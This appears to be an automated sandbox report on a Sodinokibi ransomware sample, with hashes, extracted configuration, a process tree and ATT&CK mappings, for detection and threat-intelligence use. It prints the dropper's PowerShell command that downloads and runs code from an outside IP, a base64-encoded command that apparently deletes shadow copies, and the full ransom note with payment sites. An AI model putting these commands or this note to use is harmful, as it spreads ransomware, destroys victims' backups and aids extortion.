sodinokibi | f9366f629ed77ac92ea0a86a9f063f9a33f6cb37c03b8c094f4d74515b930412

General

Target

QtxPGbas.bat
Size

189B
MD5

b896f6ff4553af50764dbf2c947a05bb
SHA1

530bc65bb8cd23bf06865ddb93164f0c6348f578
SHA256

f9366f629ed77ac92ea0a86a9f063f9a33f6cb37c03b8c094f4d74515b930412
SHA512

32377669fab2cc36cd228ef46fc33f15d36d4ef2abdd7c3c93b253d8b7a520c697cc67b80c5bd8762d1b6bac18764adb97edeca3a08e7cd24316a84384405a85

Score

10^/10

persistence ransomware evasion spyware trojan sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/QtxPGbas

Extracted

Path

C:\5cxg6z6j82-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5cxg6z6j82. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A71438A36D561A11 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A71438A36D561A11 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: PgJYxh0nMLup4AvTfR/9IGaAYk8COA4KXo9JFnx1qEEOh9YkhHgG/w3frCRlUaKE MdAcobmH/QojbnWGR2bxfZTc1POA30dYeGBadkXHh/zavLawAqH7gBjUz3EF9dUG NapCDpQDQkEipjNBbCtYPPT/CelI2OC9wrAxWnuTvWALdReqyOObVL3Yf2IHabth jeuOLXpDvPrQpdEXzgULO/YxHUE20KNcR9cvoAiN0uyf2Id2vw1Go34XTylJ0uq+ v09fdu9YaA2Max18pDg/IVkmzWqy1P21XH97OtjCET/osSnrFBh8GUsjKDkMm4xC koJAwxMaUl+XkxnGC69V7ZNMZjkMBUo+DOQj5y6eNSADnQm57AIm2ajDlPLx+ckC /8Dt905mWv0o70zkMmUkj4yC/8/odKzUxyFI8LvuXsk8ryd2XdZ7h+dQxsDD6qyc dVli6jnrwrHqoUhGTsHYbyUW9zgViO6S88Ljwpce/EACPiG0pU59PO9a28tdI+rZ aUN+OOXdKGDoynSCrJtzzmICvrTK5DgO53hGfkQnT44f9+W8iMbw/YXR75GrnOL0 V+VuYxKdOP6L1SF7Ly/RFRBGNOXaXGUyhNpP0Bq7BQTpNZRW/i21ShtLwYCCOEYx UCY+u5hjYMVwb7WTgfbVluLL/Js3EgW3Raear+YcROGjnqGEtDG5nszdiYaf/oia J8+LjhMQtJXmZb3+7uxGaAyotIfhnXRD2Lhp+cu/Ahz97ccDSxOxxz+kB5SMiNON /c75CkoCW09kFozM0rt4ZALBPrrm7Buh+Az38aepKsTulLP3hVj4scMi3YiuuQFm xz1cfpUFIp1jT6Flhd5VBblz8EycrPGigoDaSXmc/USJ682ud6PmXR1pOeCii4eB upiEiXoSRg4ProkM/Tk9Wl0LIS1pT/uvQw3mYdkEEH/d506z7YlP2QRDc6soRwYW oyAQcT1ruJROhB7os57FePCzkBBFJ8vMouuibTbMtWl2F9bm0ArTELlerIT2ybMH 7WFCkyOPRNI46D+xWwOqLtKMmjb2+Nu2vbtadLsCOWaeNsEvKLv7pLr/rjnHeIpO zXBegs5Yyeh4BzkOMtZQqfEtKbU+dv3DgeogoxWW9yDiySmcGTQMYbKKIcWMOx/g 8Qaur4r6Ggu5D3fbokjiwPekde7nFmLGwytA+5R3nEgA8lYnSuD3yU+0/xEL2FTN p9GUWlaKZCIs4PcXEdvn7NIUfo0IAtX25ffhATzj7DQcjJPev1kuEsb+c+MtP98K lUuQ9VXXIxNfdBoOkD/RjfFugAy+2hMsW8RLb1vj9LHSy8P27aIB4w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A71438A36D561A11

http://decryptor.cc/A71438A36D561A11

Signatures

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6807cp2d2y0.bmp"	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b8030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41d00000001000000100000007dc30bc974695560a2f0090a6545556c1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39620000000100000020000000cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f5300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c00b000000010000003000000044006900670069004300650072007400200047006c006f00620061006c00200052006f006f0074002000470032000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1556200000001000000200000004348a0e9444c78cb265e058d5e8944b4d84f9662bd26db257f8934a443c701615300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000006200000030603020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030106082b0601050507030406082b0601050507030206082b0601050507030306082b0601050507030906082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2008 powershell.exe

pid	process
2008	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1984 wrote to memory of 2008	1984	cmd.exe	powershell.exe
PID 2008 wrote to memory of 852	2008	powershell.exe	powershell.exe
PID 2008 wrote to memory of 852	2008	powershell.exe	powershell.exe
PID 2008 wrote to memory of 852	2008	powershell.exe	powershell.exe
PID 2008 wrote to memory of 852	2008	powershell.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

2008 powershell.exe
2008 powershell.exe
2008 powershell.exe
852 powershell.exe
852 powershell.exe

pid	process
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe
852	powershell.exe
852	powershell.exe

Blacklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
1	2008	powershell.exe
6	2008	powershell.exe
8	2008	powershell.exe
10	2008	powershell.exe
12	2008	powershell.exe
14	2008	powershell.exe
16	2008	powershell.exe
17	2008	powershell.exe
19	2008	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 37 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files\5cxg6z6j82-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\FindSave.aif	powershell.exe
File renamed	C:\Program Files\ProtectSkip.ram => \??\c:\program files\ProtectSkip.ram.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\WaitCheckpoint.i64 => \??\c:\program files\WaitCheckpoint.i64.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\FindSave.aif => \??\c:\program files\FindSave.aif.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\MergeRegister.pdf	powershell.exe
File opened for modification	\??\c:\program files\MountPublish.wav	powershell.exe
File opened for modification	\??\c:\program files\WatchRepair.aifc	powershell.exe
File created	\??\c:\program files (x86)\5cxg6z6j82-readme.txt	powershell.exe
File renamed	C:\Program Files\RegisterEnable.png => \??\c:\program files\RegisterEnable.png.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\MountPublish.wav => \??\c:\program files\MountPublish.wav.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\ConvertApprove.iso	powershell.exe
File renamed	C:\Program Files\FormatConnect.mhtml => \??\c:\program files\FormatConnect.mhtml.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\LockFormat.asp => \??\c:\program files\LockFormat.asp.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\MergeRegister.pdf => \??\c:\program files\MergeRegister.pdf.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\WatchRepair.aifc => \??\c:\program files\WatchRepair.aifc.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\FormatConnect.mhtml	powershell.exe
File renamed	C:\Program Files\ConvertApprove.iso => \??\c:\program files\ConvertApprove.iso.5cxg6z6j82	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\5cxg6z6j82-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\RegisterEnable.png	powershell.exe
File opened for modification	\??\c:\program files\UnprotectShow.3gp	powershell.exe
File renamed	C:\Program Files\UnblockExport.xltx => \??\c:\program files\UnblockExport.xltx.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\WaitCheckpoint.i64	powershell.exe
File opened for modification	\??\c:\program files\UnblockExport.xltx	powershell.exe
File renamed	C:\Program Files\UnprotectShow.3gp => \??\c:\program files\UnprotectShow.3gp.5cxg6z6j82	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\5cxg6z6j82-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AddStop.mpeg	powershell.exe
File opened for modification	\??\c:\program files\CompareDeny.snd	powershell.exe
File opened for modification	\??\c:\program files\InitializeHide.wma	powershell.exe
File renamed	C:\Program Files\ResolveApprove.otf => \??\c:\program files\ResolveApprove.otf.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\ProtectSkip.ram	powershell.exe
File opened for modification	\??\c:\program files\ResolveApprove.otf	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\5cxg6z6j82-readme.txt	powershell.exe
File renamed	C:\Program Files\CompareDeny.snd => \??\c:\program files\CompareDeny.snd.5cxg6z6j82	powershell.exe
File renamed	C:\Program Files\AddStop.mpeg => \??\c:\program files\AddStop.mpeg.5cxg6z6j82	powershell.exe
File opened for modification	\??\c:\program files\LockFormat.asp	powershell.exe
File renamed	C:\Program Files\InitializeHide.wma => \??\c:\program files\InitializeHide.wma.5cxg6z6j82	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeBackupPrivilege	1700	vssvc.exe
Token: SeRestorePrivilege	1700	vssvc.exe
Token: SeAuditPrivilege	1700	vssvc.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Discovering connected drives 3 TTPs 7 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cmd.exepowershell.exepowershell.exe

description	ioc	process
File opened (read-only)	\??\C:	cmd.exe
File opened (read-only)	\??\C:	powershell.exe
File opened (read-only)	\??\A:	powershell.exe
File opened (read-only)	\??\B:	powershell.exe
File opened (read-only)	\??\E:	powershell.exe
File opened (read-only)	\??\F:	powershell.exe
File opened (read-only)	\??\C:	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\QtxPGbas.bat"
1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/QtxPGbas');Invoke-HGCAMJ;Start-Sleep -s 10000"
2⤵
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
- Discovering connected drives
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID:852

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_269fc7d6-389e-41b0-b64b-7c0856c31fc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81674632-3ac2-413b-8a14-55e00bb0eca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aab85910-7ac3-4fc4-bbec-5e43e50581e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d23a525b-13be-4981-917b-c14eaa6ecb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da5c55b5-c1bb-4597-a419-36df000a20bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e09b2a6a-d455-4170-a504-c8cdd16a5e67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads